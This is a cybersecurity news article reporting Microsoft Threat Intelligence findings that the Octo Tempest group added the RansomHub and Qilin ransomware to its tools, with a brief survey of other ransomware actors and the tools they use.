Wednesday, November 13, 2024
HomeCyber AttackOcto Tempest Know for Attacking VMWare ESXi Servers Added RansomHub & Qilin...

Octo Tempest Know for Attacking VMWare ESXi Servers Added RansomHub & Qilin to Its Arsenal

Published on

Malware protection

Threat actors often attack VMware ESXi servers since they accommodate many virtual machines, which link to a variety of systems via one breach. 

Compromising an ESXi server can bring the targeted services down. Additionally, valuable resources and data are stored in the ESXi servers, which makes them lucrative targets for hackers.

Cybersecurity researchers at Microsoft Threat Intelligence recently discovered that Octo Tempest, which is known for Attacking VMWare ESXi servers, has recently added RansomHub and Qilin to its arsenal.

- Advertisement - SIEM as a Service

Octo Tempest & New Tools

In early to mid-2024, the ransomware group Octo Tempest expanded its harmful activities. This group, which the cybersecurity researchers at Microsoft Threat Intelligence watch very closely, started using two new types of ransomware called RansomHub and Qilin.

Protect Your Business Emails From Spoofing, Phishing & BEC with AI-Powered Security | Free Demo 

Octo Tempest is known for several dangerous tactics, such as using clever tricks to fool people into giving away information, stealing people’s online identities, finding ways to stay hidden in computer systems for a long time, often attacking VMWare ESXi servers, frequently using ransomware called BlackCat.

Octo Tempest is responsible for many cyber attacks researchers have investigated and helped fix. Their new use of RansomHub and Qilin makes them an even bigger threat than before.

RansomHub, a rapidly growing ransomware-as-a-service (RaaS) payload, is becoming one of the most widespread ransomware families. 

It’s being adopted by various threat actors, including those previously using other ransomware like BlackCat. 

Manatee Tempest deployed RansomHub following Mustard Tempest’s initial access via FakeUpdates and Socgholish. 

Other active ransomware families include:-

  • Qilin
  • BlackSuit
  • LockBit
  • Medusa
  • Black Basta
  • Play

Besides this, a new ransomware, Fog, emerged this quarter, and was used by Storm-0844, which previously favored Akira. 

Storm-0844 is a group of malicious actors that first enter through VPN clients with potentially breached accounts.

They do so via their employed open-source tools such as ADFind, Rubeus, and Advanced IP Scanner for network surveillance, lateral movement, and stage data exfiltration rclone.

The new ransomware called “FakePenny” can be traced back to the North Korean group Moonstone Sleet associated with. This actor also uses an insidious tank game as one of its tactics.

The Octo Tempest and Storm-0501 concentrate mainly on identity compromise. The latter has been using open-source platforms such as “AADInternals” in its attempts to establish domain federations, culminating in Embargo ransomware.

Different hackers use several tactics and tools, which demonstrates how this cyber-threat environment has become more sophisticated across many actor groups.

Ransomware actors misuse remote management tools, such as Storm-1811’s exploitation of Quick Assist, leading to Black Basta attacks. 

To combat this growing threat, users should stick to security best practices like credential hygiene, least privilege, and Zero Trust.

Join our free webinar to learn about combating slow DDoS attacks, a major threat today.

Kaaviya
Kaaviya
Kaaviya is a Security Editor and fellow reporter with Cyber Security News. She is covering various cyber security incidents happening in the Cyber Space.

Latest articles

Automating Identity and Access Management for Modern Enterprises

Keeping track of who has access and managing their permissions has gotten a lot...

Finding The Right E-Commerce Platform – Comparing Reselling Solutions

If you’re looking to make some extra cash or to start a business, you...

Fortinet Patches Critical Flaws That Affected Multiple Products

Fortinet, a leading cybersecurity provider, has issued patches for several critical vulnerabilities impacting multiple...

China-Nexus Actors Hijack Websites to Deliver Cobalt Strike malware

A Chinese state-sponsored threat group, identified as TAG-112, has been discovered hijacking Tibetan community...

Free Webinar

Protect Websites & APIs from Malware Attack

Malware targeting customer-facing websites and API applications poses significant risks, including compliance violations, defacements, and even blacklisting.

Join us for an insightful webinar featuring Vivek Gopalan, VP of Products at Indusface, as he shares effective strategies for safeguarding websites and APIs against malware.

Discussion points

Scan DOM, internal links, and JavaScript libraries for hidden malware.
Detect website defacements in real time.
Protect your brand by monitoring for potential blacklisting.
Prevent malware from infiltrating your server and cloud infrastructure.

More like this

Fortinet Patches Critical Flaws That Affected Multiple Products

Fortinet, a leading cybersecurity provider, has issued patches for several critical vulnerabilities impacting multiple...

China-Nexus Actors Hijack Websites to Deliver Cobalt Strike malware

A Chinese state-sponsored threat group, identified as TAG-112, has been discovered hijacking Tibetan community...

Chrome 131 Released with the Fix for Multiple Vulnerabilities

The Chrome team has officially announced the release of Chrome 131 for Windows, Mac,...